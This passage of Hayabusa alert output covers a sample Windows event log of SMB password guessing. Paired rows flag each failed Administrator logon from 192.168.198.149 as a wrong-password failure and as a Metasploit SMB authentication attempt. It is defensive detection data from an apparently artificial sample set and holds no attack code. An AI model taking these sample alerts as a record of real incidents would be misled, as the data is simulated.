NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
